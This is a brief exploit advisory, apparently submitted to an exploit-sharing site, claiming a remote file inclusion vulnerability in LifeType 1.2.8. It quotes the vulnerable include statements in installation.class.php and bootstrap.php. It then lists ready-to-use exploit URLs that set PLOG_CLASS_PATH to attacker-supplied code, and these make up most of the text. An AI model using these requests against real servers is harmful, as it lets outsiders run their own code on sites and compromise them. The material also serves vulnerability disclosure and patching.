Hi Dear, I found a new bug in LifeType. Please publish it. thank you best regards
/===============================================================================================================================================\ | | | [o] LifeType 1.2.8 Remote File Inclusion Vulnerability | | | | Software : LifeType 1.2.8 | Vendor : http://lifetype.net/ | Author : Cru3l.b0y | | Contact : Cru3l.b0y@xxxxxxxxxxxxxxxx | | Home : WwW.DeltaHacking.Net |===============================================================================================================================================| | | | [o] Vulnerable file | | | | install/installation.class.php | | | | include_once( PLOG_CLASS_PATH."config/config.properties.php" ); | | | | class/bootstrap.php | | | | include( PLOG_CLASS_PATH."class/object/loader.class.php" ); | | | | | | [o] Exploit | | | | http://localhost/[path]/install/installation.class.php?PLOG_CLASS_PATH=[evilcode] | | http://localhost/[path]/class/bootstrap.php?PLOG_CLASS_PATH=[evilcode] | | | |===============================================================================================================================================|
